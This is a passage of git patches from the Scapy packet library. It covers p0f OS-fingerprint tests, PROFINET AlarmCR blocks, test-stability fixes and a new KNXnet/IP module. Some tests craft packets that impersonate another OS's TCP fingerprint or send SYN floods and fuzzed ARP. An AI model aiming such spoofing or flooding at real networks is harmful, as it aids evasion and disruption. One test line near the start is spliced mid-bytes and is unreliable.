-_load_database("p0fr.fp") -conf.p0fr_base = "p0fr.fp" -_load_database("p0fo.fp") -conf.p0fo_base = "p0fo.fp" - -p0f_load_knowledgebases() +p0fdb.reload(conf.p0f_base) -############ -############ + Default tests -= Test p0f += Test TCP p0f, SYN - Windows +~ netaccess + +pkt = IP(b'E\x00\x004Se@\x00\x80\x06\x93?\n\x00\x00\x14\n\x00\x00\x0c\xc3\x08\x01\xbb\xcf\xb4\xbb\\\x00\x00\x00\x00\x80\x02 \x00\xeb\x1b\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x08\x01\x01\x04\x02') +assert p0f(pkt) == (('s', 'win', 'Windows', '7 or 8'), 0, False) + += Test TCP p0f, SYN - Linux +~ netaccess + +pkt = IP(b"E\x10\x00 40.77.226.249:https (S) (distance 0)\n' +pkt = IP(b'E\x00\x004Se@\x00\x80\x06\x93?\n\x00\x00\x14\n\x00\x00\x0c\xc3\x08\x01\xbb\xcf\xb4\xbb\\\x00\x00\x00\x00\x80\x02 \x00\xeb\x1b\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x08\x01\x01\x04\x02') +assert fingerprint_mtu(pkt) == "Ethernet or modem" + -############ -############ + Tests for p0f_impersonate -# XXX: a lot of pieces of p0f_impersonate don't have tests yet. += Check that the impersonated packet is properly detected by p0f +~ netaccess -= Impersonate when window size must be multiple of some integer -sig = ('%467', 64, 1, 60, 'M*,W*', '.', 'Phony Sys', '1.0') +sig = "*:64:0:*:mss*20,10:mss,sok,ts,nop,ws:df,id+:0" pkt = p0f_impersonate(IP()/TCP(), signature=sig) -assert pkt.payload.window % 467 == 0 +assert p0f(pkt) == (("s", "unix", "Linux", "3.11 and newer"), 0, False) -= Handle unusual flags ("F") quirk -sig = ('1024', 64, 0, 60, 'W*', 'F', 'Phony Sys', '1.0') += Impersonate when window size must be multiple of some integer +sig = "*:64:0:1460:%8192,0:mss,nop,ws::0" pkt = p0f_impersonate(IP()/TCP(), signature=sig) -assert (pkt.payload.flags & 40) in (8, 32, 40) +assert pkt[TCP].window % 8192 == 0 -= Use valid option values from original packet -sig = ('S4', 64, 1, 60, 'M*,W*,T', '.', 'Phony Sys', '1.0') -opts = [('MSS', 1400), ('WScale', 3), ('Timestamp', (97256, 0))] -pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) -assert pkt.payload.options == opts += Impersonate when window size must be multiple of mss +sig = "*:64:0:1024:mss*4,0:mss::0" +pkt = p0f_impersonate(IP()/TCP(), signature=sig) +assert (pkt[TCP].window // 4) == 1024 -= Use valid option values when multiples required -sig = ('S4', 64, 1, 60, 'M%37,W%19', '.', 'Phony Sys', '1.0') -opts = [('MSS', 37*15), ('WScale', 19*12)] -pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) -assert pkt.payload.options == opts += Impersonate when the following quirks are present: seq-,ack-,pushf+,urgf+ +sig = "*:64:0:1460:8192,0:mss:seq-,ack-,pushf+,urgf+:0" +pkt = p0f_impersonate(IP()/TCP(seq=1, ack=1, flags="S"), signature=sig) +tcp = pkt[TCP] +assert pkt[TCP].seq == pkt[TCP].ack == 0 +assert pkt[TCP].flags.A and pkt[TCP].flags.P and pkt[TCP].flags.U -= Discard non-multiple option values when multiples required -sig = ('S4', 64, 1, 60, 'M%37,W%19', '.', 'Phony Sys', '1.0') -opts = [('MSS', 37*15 + 1), ('WScale', 19*12 + 1)] += Use valid option values from original packet +sig = "*:64:0:*:8192,*:mss,ws,ts::0" +opts = [("MSS", 1400), ("WScale", 3), ("Timestamp", (97256, 0))] pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) -assert pkt.payload.options[0][1] % 37 == 0 -assert pkt.payload.options[1][1] % 19 == 0 +assert pkt[TCP].options == opts -= Discard bad timestamp values -sig = ('S4', 64, 1, 60, 'M*,T', '.', 'Phony Sys', '1.0') -opts = [('Timestamp', (0, 1000))] -pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) -# since option is "T" and not "T0": -assert pkt.payload.options[1][1][0] > 0 -# since T quirk is not present: -assert pkt.payload.options[1][1][1] == 0 - -= Discard 2nd timestamp of 0 if "T" quirk is present -sig = ('S4', 64, 1, 60, 'M*,T', 'T', 'Phony Sys', '1.0') -opts = [('Timestamp', (54321, 0))] += Discard invalid options values +sig = "*:64:0:1000:8192,5:mss,ws::0" +opts = [("MSS", 1400), ("WScale", 3)] pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) -assert pkt.payload.options[1][1][1] > 0 +assert pkt[TCP].options[0][1] == 1000 +assert pkt[TCP].options[1][1] == 5 + Clear temp files @@ -116,7 +118,4 @@ def _rem(f): except: pass -_rem("p0f.fp") -_rem("p0fa.fp") -_rem("p0fr.fp") -_rem("p0fo.fp") \ No newline at end of file +_rem("p0f.fp") \ No newline at end of file diff --git a/test/p0fv2.uts b/test/p0fv2.uts new file mode 100644 index 00000000000..594c4e9660e --- /dev/null +++ b/test/p0fv2.uts @@ -0,0 +1,122 @@ +% Tests for Scapy's p0fv2 module. + +~ p0f + + +############ +############ ++ Basic p0f module tests + += Module loading +load_module('p0fv2') + += Fetch database +~ netaccess + +from __future__ import print_function +try: + from urllib.request import urlopen +except ImportError: + from urllib2 import urlopen + +def _load_database(file): + for i in range(10): + try: + open(file, 'wb').write(urlopen('https://raw.githubusercontent.com/p0f/p0f/4b4d1f384abebbb9b1b25b8f3c6df5ad7ab365f7/' + file).read()) + break + except: + raise + pass + +_load_database("p0f.fp") +conf.p0f_base = "p0f.fp" +_load_database("p0fa.fp") +conf.p0fa_base = "p0fa.fp" +_load_database("p0fr.fp") +conf.p0fr_base = "p0fr.fp" +_load_database("p0fo.fp") +conf.p0fo_base = "p0fo.fp" + +p0f_load_knowledgebases() + +############ +############ ++ Default tests + += Test p0f +~ netaccess + +pkt = Ether(b'\x14\x0cv\x8f\xfe(\xd0P\x99V\xdd\xf9\x08\x00E\x00\x0045+@\x00\x80\x06\x00\x00\xc0\xa8\x00w(M\xe2\xf9\xda\xcb\x01\xbbcc\xdd\x1e\x00\x00\x00\x00\x80\x02\xfa\xf0\xcc\x8c\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x08\x01\x01\x04\x02') + +assert p0f(pkt) == [('@Windows', 'XP/2000 (RFC1323+, w+, tstamp-)', 0)] + += Test prnp0f +~ netaccess + +with ContextManagerCaptureOutput() as cmco: + prnp0f(pkt) + assert cmco.get_output() == '192.168.0.119:56011 - @Windows XP/2000 (RFC1323+, w+, tstamp-)\n -> 40.77.226.249:https (S) (distance 0)\n' + +############ +############ ++ Tests for p0f_impersonate + +# XXX: a lot of pieces of p0f_impersonate don't have tests yet. + += Impersonate when window size must be multiple of some integer +sig = ('%467', 64, 1, 60, 'M*,W*', '.', 'Phony Sys', '1.0') +pkt = p0f_impersonate(IP()/TCP(), signature=sig) +assert pkt.payload.window % 467 == 0 + += Handle unusual flags ("F") quirk +sig = ('1024', 64, 0, 60, 'W*', 'F', 'Phony Sys', '1.0') +pkt = p0f_impersonate(IP()/TCP(), signature=sig) +assert (pkt.payload.flags & 40) in (8, 32, 40) + += Use valid option values from original packet +sig = ('S4', 64, 1, 60, 'M*,W*,T', '.', 'Phony Sys', '1.0') +opts = [('MSS', 1400), ('WScale', 3), ('Timestamp', (97256, 0))] +pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) +assert pkt.payload.options == opts + += Use valid option values when multiples required +sig = ('S4', 64, 1, 60, 'M%37,W%19', '.', 'Phony Sys', '1.0') +opts = [('MSS', 37*15), ('WScale', 19*12)] +pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) +assert pkt.payload.options == opts + += Discard non-multiple option values when multiples required +sig = ('S4', 64, 1, 60, 'M%37,W%19', '.', 'Phony Sys', '1.0') +opts = [('MSS', 37*15 + 1), ('WScale', 19*12 + 1)] +pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) +assert pkt.payload.options[0][1] % 37 == 0 +assert pkt.payload.options[1][1] % 19 == 0 + += Discard bad timestamp values +sig = ('S4', 64, 1, 60, 'M*,T', '.', 'Phony Sys', '1.0') +opts = [('Timestamp', (0, 1000))] +pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) +# since option is "T" and not "T0": +assert pkt.payload.options[1][1][0] > 0 +# since T quirk is not present: +assert pkt.payload.options[1][1][1] == 0 + += Discard 2nd timestamp of 0 if "T" quirk is present +sig = ('S4', 64, 1, 60, 'M*,T', 'T', 'Phony Sys', '1.0') +opts = [('Timestamp', (54321, 0))] +pkt = p0f_impersonate(IP()/TCP(options=opts), signature=sig) +assert pkt.payload.options[1][1][1] > 0 + ++ Clear temp files + += Remove fp files +def _rem(f): + try: + os.remove(f) + except: + pass + +_rem("p0f.fp") +_rem("p0fa.fp") +_rem("p0fr.fp") +_rem("p0fo.fp") \ No newline at end of file From c345c03858496a6d92b9ed01cc136027e5cf5b9b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 1 Aug 2021 13:17:09 +0200 Subject: [PATCH 0616/1632] Remove version badges (too big) & resize logo --- README.md | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/README.md b/README.md index fcbc98b3f13..ba7b62253f4 100644 --- a/README.md +++ b/README.md @@ -1,17 +1,12 @@ -

    - -

    - -# Scapy +# Scapy   Scapy [![Scapy unit tests](https://github.com/secdev/scapy/workflows/Scapy%20unit%20tests/badge.svg?event=push)](https://github.com/secdev/scapy/actions?query=workflow%3A%22Scapy+unit+tests%22+branch%3Amaster+event%3Apush) [![AppVeyor Build status](https://ci.appveyor.com/api/projects/status/os03daotfja0wtp7/branch/master?svg=true)](https://ci.appveyor.com/project/secdev/scapy/branch/master) [![Codecov Status](https://codecov.io/gh/secdev/scapy/branch/master/graph/badge.svg)](https://codecov.io/gh/secdev/scapy) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/30ee6772bb264a689a2604f5cdb0437b)](https://www.codacy.com/app/secdev/scapy) [![PyPI Version](https://img.shields.io/pypi/v/scapy.svg)](https://pypi.python.org/pypi/scapy/) -[![Python Versions](https://img.shields.io/pypi/pyversions/scapy.svg)](https://pypi.python.org/pypi/scapy/) [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](LICENSE) [![Join the chat at https://gitter.im/secdev/scapy](https://badges.gitter.im/secdev/scapy.svg)](https://gitter.im/secdev/scapy) From af974c3101ea5e9928c48188c120bdfeed494280 Mon Sep 17 00:00:00 2001 From: Chris Packham Date: Fri, 16 Jul 2021 11:01:53 +1200 Subject: [PATCH 0617/1632] contrib/pnio: Add AlarmCRBlockReq and AlarmCRBlockRes Add AlarmCRBlockReq and it's response AlarmCRBlockRes. These are required to successfully create an application relationship to a PROFINET IO device. --- scapy/contrib/pnio_rpc.py | 65 +++++++++++++++++++++++++++++++++++++++ test/contrib/pnio_rpc.uts | 32 +++++++++++++++++++ 2 files changed, 97 insertions(+) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index fbe730c2f7a..32325494e8e 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -852,11 +852,75 @@ def get_response(self): return None # no response associated (should be modulediffblock) +ALARM_CR_TYPE = { + 0x0001: "AlarmCR", +} + +ALARM_CR_TRANSPORT = { + 0x0: "RTA_CLASS_1", + 0x1: "RTA_CLASS_UDP" +} + + +class AlarmCRBlockReq(Block): + """Alarm CR block request""" + fields_desc = [ + BlockHeader, + XShortEnumField("AlarmCRType", 1, ALARM_CR_TYPE), + ShortField("LT", 0x8892), + BitField("AlarmCRProperties_Priority", 0, 1), + BitEnumField("AlarmCRProperties_Transport", 0, 1, ALARM_CR_TRANSPORT), + BitField("AlarmCRProperties_Reserved1", 0, 22), + BitField("AlarmCRProperties_Reserved2", 0, 8), + ShortField("RTATimeoutFactor", 0x0001), + ShortField("RTARetries", 0x0003), + ShortField("LocalAlarmReference", 0x0003), + ShortField("MaxAlarmDataLength", 0x00C8), + ShortField("AlarmCRTagHeaderHigh", 0xC000), + ShortField("AlarmCRTagHeaderLow", 0xA000), + ] + # default block_type value + block_type = 0x0103 + + def post_build(self, p, pay): + # Set the LT based on transport + if self.AlarmCRProperties_Transport == 0x1: + p = p[:8] + struct.pack("!H", 0x0800) + p[10:] + print("p[:8]={}".format(bytes(p[:8]).hex())) + print("p[10:]={}".format(bytes(p[10:]).hex())) + print("p={}".format(bytes(p).hex())) + + return Block.post_build(self, p, pay) + + def get_response(self): + """Generate the response block of this request. + Careful: it only sets the fields which can be set from the request + """ + res = AlarmCRBlockRes() + for field in ["AlarmCRType", "LocalAlarmReference"]: + res.setfieldval(field, self.getfieldval(field)) + + res.block_type = self.block_type + 0x8000 + return res + + +class AlarmCRBlockRes(Block): + fields_desc = [ + BlockHeader, + XShortEnumField("AlarmCRType", 1, ALARM_CR_TYPE), + ShortField("LocalAlarmReference", 0), + ShortField("MaxAlarmDataLength", 0) + ] + # default block_type value + block_type = 0x8103 + + # PROFINET IO DCE/RPC PDU PNIO_RPC_BLOCK_ASSOCIATION = { # requests "0101": ARBlockReq, "0102": IOCRBlockReq, + "0103": AlarmCRBlockReq, "0104": ExpectedSubmoduleBlockReq, "0110": IODControlReq, "0111": IODControlReq, @@ -870,6 +934,7 @@ def get_response(self): # responses "8101": ARBlockRes, "8102": IOCRBlockRes, + "8103": AlarmCRBlockRes, "8110": IODControlRes, "8111": IODControlRes, "8112": IODControlRes, diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index 38884be0db3..19f31dd1dbc 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -427,6 +427,38 @@ p == ExpectedSubmoduleBlockReq(block_length=38, ] ) / conf.padding_layer(b'\xef') + +#################################################################### +#################################################################### + ++ Check AlarmCRBlockReq + += AlarmCRBlockReq default values +bytes(AlarmCRBlockReq()) == bytearray.fromhex('010300160100000188920000000000010003000300c8c000a000') + += AlarmCRBlockReq with transport +bytes(AlarmCRBlockReq(AlarmCRProperties_Transport=1)) == bytearray.fromhex('010300160100000108004000000000010003000300c8c000a000') + += AlarmCRBlockReq dissection +p = AlarmCRBlockReq(bytearray.fromhex('010300160100000188920000000000010003000300c8c000a000')) +p[AlarmCRBlockReq].AlarmCRType == 0x0001 +p[AlarmCRBlockReq].LocalAlarmReference == 0x0003 + += AlarmCRBlockReq response +p = p.get_response() +p == AlarmCRBlockRes(AlarmCRType=0x0001, LocalAlarmReference=0x0003) + ++ Check AlarmCRBlockRes + += AlarmCRBlockRes default values +bytes(AlarmCRBlockRes()) == bytearray.fromhex('810300080100000100000000') + += AlarmCRBlockRes dissection +p = AlarmCRBlockRes(bytearray.fromhex('810300080100000100030000')) +p[AlarmCRBlockRes].AlarmCRType == 0x0001 +p[AlarmCRBlockRes].LocalAlarmReference == 0x0003 + + #################################################################### #################################################################### From 513f2dacaeefcc45c01fabce70f70d228ee5a194 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 3 Aug 2021 20:04:59 +0200 Subject: [PATCH 0618/1632] Stabilize loop test, fix 3306, disable unstable tests (#3307) * Stabilize loop test, fix 3306 * Disable unstable tests: CAN/ISOTP * Add warning on non-IPv4 ARP * Remove debug prints --- scapy/arch/bpf/core.py | 4 ++++ scapy/arch/bpf/supersocket.py | 2 +- scapy/arch/linux.py | 2 +- scapy/contrib/pnio_rpc.py | 3 --- scapy/layers/l2.py | 13 ++++++++++--- scapy/packet.py | 2 +- scapy/sendrecv.py | 5 +++++ test/contrib/cansocket.uts | 2 +- test/contrib/cansocket_native.uts | 2 +- test/contrib/cansocket_python_can.uts | 2 +- test/contrib/isotp.uts | 2 +- test/contrib/isotpscan.uts | 2 +- test/imports.uts | 6 +++++- test/p0f.uts | 6 ++++-- test/regression.uts | 28 ++++++++++++++++----------- 15 files changed, 53 insertions(+), 28 deletions(-) diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index a364782b33e..39a4025befc 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -22,6 +22,7 @@ from scapy.arch.unix import in6_getifaddr from scapy.compat import plain_str from scapy.config import conf +from scapy.consts import LINUX from scapy.data import ARPHDR_LOOPBACK, ARPHDR_ETHER from scapy.error import Scapy_Exception, warning from scapy.interfaces import InterfaceProvider, IFACES, NetworkInterface, \ @@ -29,6 +30,9 @@ from scapy.pton_ntop import inet_ntop from scapy.modules.six.moves import range +if LINUX: + raise OSError("BPF conflicts with Linux") + # ctypes definitions diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 7f7fc406be8..efdde88c7ca 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -379,7 +379,7 @@ def send(self, pkt): # Use the routing table to find the output interface iff = pkt.route()[0] if iff is None: - iff = conf.iface + iff = network_name(conf.iface) # Assign the network interface to the BPF handle if self.assigned_interface != iff: diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 9f7e69e5583..94fac8f077f 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -600,7 +600,7 @@ def send(self, x): # type: (Packet) -> int iff = x.route()[0] if iff is None: - iff = conf.iface + iff = network_name(conf.iface) sdto = (iff, self.type) self.outs.bind(sdto) sn = self.outs.getsockname() diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index 32325494e8e..ef51bbf972d 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -886,9 +886,6 @@ def post_build(self, p, pay): # Set the LT based on transport if self.AlarmCRProperties_Transport == 0x1: p = p[:8] + struct.pack("!H", 0x0800) + p[10:] - print("p[:8]={}".format(bytes(p[:8]).hex())) - print("p[10:]={}".format(bytes(p[10:]).hex())) - print("p={}".format(bytes(p).hex())) return Block.post_build(self, p, pay) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 47957f73926..fc140dfa8c8 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -24,7 +24,7 @@ DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LOOP, \ DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, \ ETH_P_MACSEC -from scapy.error import warning, ScapyNoDstMacException +from scapy.error import warning, ScapyNoDstMacException, log_runtime from scapy.fields import ( BCDFloatField, BitField, @@ -478,7 +478,7 @@ def answers(self, other): return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)] def route(self): - # type: () -> Tuple[Union[NetworkInterface, str, None], Optional[str], Optional[str]] # noqa: E501 + # type: () -> Tuple[Optional[str], Optional[str], Optional[str]] fld, dst = cast(Tuple[MultipleTypeField, str], self.getfield_and_val("pdst")) fld_inner, dst = fld._find_fld_pkt_val(self, dst) @@ -506,7 +506,14 @@ def mysummary(self): def l2_register_l3_arp(l2, l3): # type: (Type[Packet], Type[Packet]) -> Optional[str] - return getmacbyip(l3.pdst) + # TODO: support IPv6? + if l3.plen == 4: + return getmacbyip(l3.pdst) + log_runtime.warning( + "Unable to guess L2 MAC address from an ARP packet with a " + "non-IPv4 pdst. Provide it manually !" + ) + return None conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp) diff --git a/scapy/packet.py b/scapy/packet.py index 5e22f3a82ca..3af5c3c78db 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1361,7 +1361,7 @@ def __contains__(self, cls): return self.haslayer(cls) def route(self): - # type: () -> Tuple[Any, Optional[str], Optional[str]] + # type: () -> Tuple[Optional[str], Optional[str], Optional[str]] return self.payload.route() def fragment(self, *args, **kargs): diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 4b1b2680e23..6890e412be6 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -795,6 +795,7 @@ def srploop(pkts, # type: _PacketIterable def sndrcvflood(pks, # type: SuperSocket pkt, # type: _PacketIterable inter=0, # type: int + maxretries=None, # type: Optional[int] verbose=None, # type: Optional[int] chainCC=False, # type: bool timeout=None # type: Optional[int] @@ -807,7 +808,11 @@ def send_in_loop(tobesent, stopevent): # type: (_PacketIterable, Event) -> Iterator[Packet] """Infinite generator that produces the same packet until stopevent is triggered.""" + i = 0 while True: + i += 1 + if maxretries and i >= maxretries: + return for p in tobesent: if stopevent.is_set(): return diff --git a/test/contrib/cansocket.uts b/test/contrib/cansocket.uts index 9799b612481..2d6ae249ec1 100644 --- a/test/contrib/cansocket.uts +++ b/test/contrib/cansocket.uts @@ -1,5 +1,5 @@ % Regression tests for compatibility between NativeCANSocket and PythonCANSocket -~ python3_only not_pypy vcan_socket needs_root linux +~ python3_only not_pypy vcan_socket needs_root linux disabled # More information at http://www.secdev.org/projects/UTscapy/ diff --git a/test/contrib/cansocket_native.uts b/test/contrib/cansocket_native.uts index 48a34aa165f..b1fd44da0e9 100644 --- a/test/contrib/cansocket_native.uts +++ b/test/contrib/cansocket_native.uts @@ -1,5 +1,5 @@ % Regression tests for nativecansocket -~ python3_only not_pypy vcan_socket needs_root linux +~ python3_only not_pypy vcan_socket needs_root linux disabled # More information at http://www.secdev.org/projects/UTscapy/ diff --git a/test/contrib/cansocket_python_can.uts b/test/contrib/cansocket_python_can.uts index a17cf0d4e22..388e42f55f2 100644 --- a/test/contrib/cansocket_python_can.uts +++ b/test/contrib/cansocket_python_can.uts @@ -1,5 +1,5 @@ % Regression tests for the CANSocket -~ vcan_socket linux needs_root +~ vcan_socket linux needs_root disabled # More information at http://www.secdev.org/projects/UTscapy/ diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 29c270e34fb..b1e77a532c1 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1,6 +1,6 @@ % Regression tests for ISOTP -~ automotive_comm +~ automotive_comm disabled + Configuration ~ conf diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 6367158dd36..643c58a91d1 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,5 +1,5 @@ % Regression tests for isotp_scan -~ not_pypy vcan_socket needs_root automotive_comm +~ not_pypy vcan_socket needs_root automotive_comm disabled * Some tests are disabled to lower the CI utilitzation + Configuration diff --git a/test/imports.uts b/test/imports.uts index ba3e302da27..92ea76b32e7 100644 --- a/test/imports.uts +++ b/test/imports.uts @@ -13,10 +13,12 @@ import subprocess # a GREAT reason. EXCEPTIONS = [ "scapy.__main__", + "scapy.all", "scapy.contrib.automotive*", "scapy.contrib.cansocket*", "scapy.contrib.isotp*", "scapy.contrib.scada*", + "scapy.layers.all", "scapy.main", ] @@ -72,8 +74,10 @@ fld, file = os.path.split(tmp) sys.path.append(fld) pkg = importlib.import_module(os.path.splitext(file)[0]) +NB_PROC = 1 if WINDOWS else 4 + def import_all(FILES): - with Pool(processes=4) as pool: + with Pool(processes=NB_PROC) as pool: for err in pool.imap_unordered(pkg.process_file, FILES): if err: print(err) diff --git a/test/p0f.uts b/test/p0f.uts index dee6745862b..bf257a0c1f0 100644 --- a/test/p0f.uts +++ b/test/p0f.uts @@ -77,7 +77,9 @@ assert fingerprint_mtu(pkt) == "Ethernet or modem" sig = "*:64:0:*:mss*20,10:mss,sok,ts,nop,ws:df,id+:0" pkt = p0f_impersonate(IP()/TCP(), signature=sig) -assert p0f(pkt) == (("s", "unix", "Linux", "3.11 and newer"), 0, False) +imp = p0f(pkt) +print(imp) +assert imp == (("s", "unix", "Linux", "3.11 and newer"), 0, False) = Impersonate when window size must be multiple of some integer sig = "*:64:0:1460:%8192,0:mss,nop,ws::0" @@ -118,4 +120,4 @@ def _rem(f): except: pass -_rem("p0f.fp") \ No newline at end of file +_rem("p0f.fp") diff --git a/test/regression.uts b/test/regression.uts index 6106d1fb939..95c19988733 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -209,7 +209,7 @@ get_working_if() get_if_raw_addr6(conf.iface) -if not WINDOWS: +if conf.use_bpf: addr = u"lladdr 29:0b:c2:ff:fe:53:21:e9\n" b = Bunch(returncode=0, communicate=lambda *args, **kargs: (addr, None)) with mock.patch('scapy.arch.bpf.core.subprocess.Popen', return_value=b) as popen: @@ -1436,16 +1436,17 @@ def _test(): retry_test(_test) = Sending and receiving an TCP syn with flooding methods -~ netaccess IP +~ netaccess IP flood from functools import partial # flooding methods do not support timeout. Packing the test for security -def _test_flood(flood_function, add_ether=False): +def _test_flood(ip, flood_function, add_ether=False): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False - p = IP(dst="www.google.com")/TCP(sport=RandShort(), dport=80, flags="S") + p = IP(dst=ip)/TCP(sport=RandShort(), dport=80, flags="S") if add_ether: p = Ether()/p - x = flood_function(p, timeout=0.5) + p.show2() + x = flood_function(p, timeout=0.5, maxretries=10) conf.debug_dissector = old_debug_dissector if type(x) == tuple: x = x[0][0][1] @@ -1453,16 +1454,16 @@ def _test_flood(flood_function, add_ether=False): assert x[IP].ottl() in [32, 64, 128, 255] assert 0 <= x[IP].hops() <= 126 -_test_srflood = partial(_test_flood, srflood) +_test_srflood = partial(_test_flood, "www.google.com", srflood) retry_test(_test_srflood) -_test_sr1flood = partial(_test_flood, sr1flood) +_test_sr1flood = partial(_test_flood, "www.google.fr", sr1flood) retry_test(_test_sr1flood) -_test_srpflood = partial(_test_flood, srpflood, True) +_test_srpflood = partial(_test_flood, "www.google.net", srpflood, True) retry_test(_test_srpflood) -_test_srp1flood = partial(_test_flood, srp1flood, True) +_test_srp1flood = partial(_test_flood, "www.google.co.uk", srp1flood, True) retry_test(_test_srp1flood) = Sending and receiving an ICMPv6EchoRequest @@ -1666,18 +1667,23 @@ s.show() s.show(2) = send() and sniff() -~ netaccess ss +~ netaccess def _test(): sendp(Ether()/IP(src="9.0.0.0")/UDP(), count=3, iface=conf.iface) r = sniff(timeout=3, count=1, - lfilter=lambda x: x[IP].src == "9.0.0.0", + lfilter=lambda x: IP in x and x[IP].src == "9.0.0.0", iface=conf.iface, started_callback=_test) assert r += GH issue 3306 +~ netaccess + +send(fuzz(ARP())) + = Test SuperSocket.select ~ select From 2f2e46fdf610f74b2ef3f848da372cdd6d979c8d Mon Sep 17 00:00:00 2001 From: Julien Bedel <30991560+JulienBedel@users.noreply.github.com> Date: Tue, 3 Aug 2021 21:12:52 +0200 Subject: [PATCH 0619/1632] Add support for KNXnet/IP (#3272) * Add support for KNXnet/IP protocol Provides Scapy layers for KNXNet/IP communications over UDP, according to ISO-IEC 14543-3 Currently, the module (partially) supports the following services : - SEARCH REQUEST/RESPONSE - DESCRIPTION REQUEST/RESPONSE - CONNECT, DISCONNECT, CONNECTION_STATE REQUEST/RESPONSE - CONFIGURATION REQUEST/RESPONSE - TUNNELING REQUEST/RESPONSE * Add a test campaign for KNXnet/IP Add basic tests for KNXnet/IP implementation, including : - packet creation - header length and payload guess * Add initial fixes for https://github.com/secdev/scapy/pull/3272 Replace type() by isinstance() in KNX module As pointed out by gpotter2 in https://github.com/secdev/scapy/pull/3272 : - https://github.com/secdev/scapy/pull/3272#discussion_r662643254 - https://github.com/secdev/scapy/pull/3272#discussion_r662643481 Add condition before length computations in KNX We only change structure lengths if they are not specified by the user, as it is scapy's philosophy to always allow the user to overwrite everything. Pointed out by gpotter2 in https://github.com/secdev/scapy/pull/3272 : - https://github.com/secdev/scapy/pull/3272 Replace to_bytes by struct.pack() in KNX module As pointed out by gpotter2 in https://github.com/secdev/scapy/pull/3272 : - https://github.com/secdev/scapy/pull/3272#discussion_r662643743 Fix layer bindings to avoid conflicts in KNX As pointed out by gpotter2 in https://github.com/secdev/scapy/pull/3272 : - https://github.com/secdev/scapy/pull/3272#discussion_r662645071 Fix KNX module to be PEP8 compliant Pointed out by guedou in https://github.com/secdev/scapy/pull/3272 : - https://github.com/secdev/scapy/pull/3272#issuecomment-873396056 - https://github.com/secdev/scapy/pull/3272/checks?check_run_id=2942182592 * Edit condition before length computations in KNX We only change structure lengths if they are not specified by the user, as it is scapy's philosophy to always allow the user to overwrite everything. Replaces p[x] == 0x00 check to self.structure_length is None: * flake8 errors fix for KNX module --- scapy/contrib/knx.py | 644 +++++++++++++++++++++++++++++++++++++++++++ test/contrib/knx.uts | 75 +++++ 2 files changed, 719 insertions(+) create mode 100644 scapy/contrib/knx.py create mode 100644 test/contrib/knx.uts diff --git a/scapy/contrib/knx.py b/scapy/contrib/knx.py new file mode 100644 index 00000000000..d36c6220d3f --- /dev/null +++ b/scapy/contrib/knx.py @@ -0,0 +1,644 @@ +# This file is part of Scapy +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . + +# Copyright (C) 2021 Julien BEDEL +# Claire VACHEROT + +# This module provides Scapy layers for KNXNet/IP communications over UDP +# according to KNX specifications v2.1 / ISO-IEC 14543-3. +# Specifications can be downloaded for free here : +# https://my.knx.org/en/shop/knx-specifications +# +# Currently, the module (partially) supports the following services : +# * SEARCH REQUEST/RESPONSE +# * DESCRIPTION REQUEST/RESPONSE +# * CONNECT, DISCONNECT, CONNECTION_STATE REQUEST/RESPONSE +# * CONFIGURATION REQUEST/RESPONSE +# * TUNNELING REQUEST/RESPONSE + +# scapy.contrib.description = KNX Protocol +# scapy.contrib.status = loads +import struct + +from scapy.fields import PacketField, MultipleTypeField, ByteField, \ + XByteField, ShortEnumField, 